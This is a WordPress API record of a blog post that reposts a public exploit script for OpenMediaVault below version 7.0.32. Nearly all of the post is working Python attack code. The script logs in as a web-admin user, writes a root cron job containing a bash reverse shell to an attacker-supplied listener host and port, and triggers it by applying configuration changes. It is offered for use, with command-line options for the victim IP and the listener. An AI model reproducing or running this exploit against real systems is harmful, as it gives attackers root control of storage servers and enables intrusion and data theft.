{"id":56713,"date":"2024-05-09T20:29:40","date_gmt":"2024-05-09T16:29:40","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178526\/openmediavault-execescalate.txt"},"modified":"2024-05-09T20:29:40","modified_gmt":"2024-05-09T16:29:40","slug":"openmediavault-remote-code-execution-local-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/openmediavault-remote-code-execution-local-privilege-escalation\/","title":{"rendered":"Openmediavault Remote Code Execution \/ Local Privilege Escalation"},"content":{"rendered":"<p># Exploit Title: Openmediavault &lt; 7.0.32 Authenticated RCE &amp; Local Privilege Escalation<br \/># Date: 08.05.2024<br \/># Exploit Author: Mert BENADAM<br \/># Vendor Homepage: https:\/\/www.openmediavault.org\/<br \/># Software Link: https:\/\/sourceforge.net\/projects\/openmediavault\/<br \/># Version: &lt; 7.0.32<br \/># Tested on: OMV 7.0.32 &amp; 6.5 @Virtual Machine<br \/># Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux.<\/p>\n<p># Special Thx: k3yZ :)<br \/>&#8220;&#8221;&#8221;<br \/>PoC:<br \/>This vulnerability occurs when users in the web-admin group enter commands on the crontab by selecting the root shell.<br \/>As a result of exploiting the vulnerability,authenticated web-admin users can run commands with root privileges and receive reverse shell connections.<br \/>It can also be used in privilege escalation attacks on local systems.<br \/>&#8220;&#8221;&#8221;<\/p>\n<p>import argparse<br \/>import requests<br \/>import json<\/p>\n<p>def login(ip_address, username, password, lhost, lport):<br \/>try:<br \/>login_data = {<br \/>&#8220;service&#8221;: &#8220;Session&#8221;,<br \/>&#8220;method&#8221;: &#8220;login&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;username&#8221;: username,<br \/>&#8220;password&#8221;: password<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<\/p>\n<p>response = requests.post(url, json=login_data)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Login Success , Checking User Privilages&#8230;&#8221;)<br \/>post_check(ip_address, response.cookies, lhost , lport)<br \/>else:<br \/>print(&#8220;login Failed, Probably Wrong User Credentials&#8230;&#8221;)<\/p>\n<p>print(&#8220;Reason:&#8221;)<br \/>print(response.json())<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def post_check(ip_address, cookies, lhost, lport):<br \/>try:<br \/>post_data = {<br \/>&#8220;service&#8221;: &#8220;Cron&#8221;,<br \/>&#8220;method&#8221;: &#8220;getList&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;type&#8221;: [&#8220;userdefined&#8221;],<br \/>&#8220;start&#8221;: 0,<br \/>&#8220;limit&#8221;: -1<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<br \/>response = requests.post(url, json=post_data, cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Accesing Crons&#8230;OK&#8221;)<br \/>send_post(ip_address, cookies, lhost , lport)<\/p>\n<p>elif response.status_code == 403:<br \/>print(&#8220;Kullan\u0131c\u0131 yetkili de\u011fil.&#8221;)<br \/>else:<br \/>print(&#8220;Post Request Failure&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Beklenmeyen bir hata olu\u015ftu:&#8221;, e)<\/p>\n<p>def send_post(ip_address, cookies, lhost , lport):<br \/>try:<\/p>\n<p>post_data = {<br \/>&#8220;service&#8221;: &#8220;Cron&#8221;,<br \/>&#8220;method&#8221;: &#8220;set&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;uuid&#8221;: &#8220;fa4b1c66-ef79-11e5-87a0-0002b3a176b4&#8221;, # UUID<br \/>&#8220;enable&#8221;: True,<br \/>&#8220;execution&#8221;: &#8220;exactly&#8221;,<br \/>&#8220;minute&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everynminute&#8221;: False,<br \/>&#8220;hour&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everynhour&#8221;: False,<br \/>&#8220;dayofmonth&#8221;: [&#8220;*&#8221;],<br \/>&#8220;everyndayofmonth&#8221;: False,<br \/>&#8220;month&#8221;: [&#8220;*&#8221;],<br \/>&#8220;dayofweek&#8221;: [&#8220;*&#8221;],<br \/>&#8220;username&#8221;: &#8220;root&#8221;,<br \/>&#8220;command&#8221;: f&#8221;bash -c &#8216;exec bash -i &amp;&gt;\/dev\/tcp\/{lhost}\/{lport} &lt;&amp;1&#8242;&#8221;, # Command From User<br \/>&#8220;sendemail&#8221;: False,<br \/>&#8220;comment&#8221;: &#8220;&#8221;,<br \/>&#8220;type&#8221;: &#8220;userdefined&#8221;<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<br \/>response = requests.post(url, json=post_data, cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Payload Sent&#8230; OK,&#8221;)<br \/>update(ip_address, cookies)<br \/>elif response.status_code == 403:<br \/>print(&#8220;User Not Authrorized.&#8221;)<br \/>else:<br \/>print(&#8220;Something Wrong.CHECK your version&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def update(ip_address, cookies):<br \/>try:<\/p>\n<p>post_data = {<br \/>&#8220;service&#8221;: &#8220;Config&#8221;,<br \/>&#8220;method&#8221;: &#8220;applyChangesBg&#8221;,<br \/>&#8220;params&#8221;: {<br \/>&#8220;modules&#8221;: [],<br \/>&#8220;force&#8221;: False<br \/>},<br \/>&#8220;options&#8221;: None<br \/>}<\/p>\n<p>url = f&#8221;http:\/\/{ip_address}\/rpc.php&#8221;<\/p>\n<p>response = requests.post(url, json=post_data, cookies=cookies)<\/p>\n<p>if response.status_code == 200:<br \/>print(&#8220;Updating crontabs&#8230;&#8221;)<br \/>print(&#8220;Successfully Exploited&#8230;&#8221;)<br \/>print(&#8220;Exploited Shell Will Be Triggered In 1 Minute, Check Your Listener&#8230;&#8221;)<br \/>print(&#8220;Warning: Make sure You Open a listener And Enter Correct IP-PORT Information&#8230;&#8221;)<br \/>elif response.status_code == 403:<br \/>print(&#8220;User Not Authrorized.&#8221;)<br \/>else:<br \/>print(&#8220;Someting Wrong. Check version&#8230;&#8221;)<\/p>\n<p>except requests.exceptions.ConnectionError:<br \/>print(&#8220;Connection Error: Could Not Connect To The Server&#8230;&#8221;)<br \/>except Exception as e:<br \/>print(&#8220;Unexpected Error:&#8221;, e)<\/p>\n<p>def main():<br \/>font=&#8221;&#8221;&#8221;<\/p>\n<p>\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557<br \/>\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2588\u2588\u2588\u2588\u2557<br \/>\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2551<br \/>\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551<br \/>\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u255a\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d<br \/>\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d<\/p>\n<p>&#8220;&#8221;&#8221;<br \/>parser = argparse.ArgumentParser(description=&#8221;OpenMediaVault 7.0.32 &gt; 6.5.0 RCE And Local Privilage Escalation&#8221;)<br \/>parser.add_argument(&#8220;-U&#8221;, &#8220;&#8211;ip&#8221;, type=str, help=&#8221;Victim Ip Adress&#8221;, required=False)<br \/>parser.add_argument(&#8220;-u&#8221;, &#8220;&#8211;username&#8221;, type=str, help=&#8221;Username For Web Admin&#8221;, required=False)<br \/>parser.add_argument(&#8220;-p&#8221;, &#8220;&#8211;password&#8221;, type=str, help=&#8221;Password For Web Admin&#8221;, required=False)<br \/>parser.add_argument(&#8220;-L&#8221;, &#8220;&#8211;lhost&#8221;, type=str, help=&#8221;Listener IP Adress For Reverse Shell&#8221;, required=False)<br \/>parser.add_argument(&#8220;-P&#8221;, &#8220;&#8211;lport&#8221;, type=str, help=&#8221;Listener Port For Reverse Shell&#8221;, required=False)<\/p>\n<p>args = parser.parse_args()<\/p>\n<p>if args.ip and args.username and args.password and args.lhost and args.lport:<br \/>print(font)<br \/>login(args.ip, args.username, args.password, args.lhost , args.lport)<br \/>else:<br \/>print(font)<br \/>parser.print_help()<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>main()<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Openmediavault &lt; 7.0.32 Authenticated RCE &amp; Local Privilege Escalation# Date: 08.05.2024# Exploit Author: Mert BENADAM# Vendor Homepage: https:\/\/www.openmediavault.org\/# Software Link: https:\/\/sourceforge.net\/projects\/openmediavault\/# Version: &lt; 7.0.32# Tested on: OMV 7.0.32 &amp; 6.5 @Virtual Machine# Description: OpenMediaVault is the next generation network attached storage (NAS) solution based on Debian Linux. # Special Thx: k3yZ :)&#8220;&#8221;&#8221;PoC:This &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56713","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56713"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56713\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}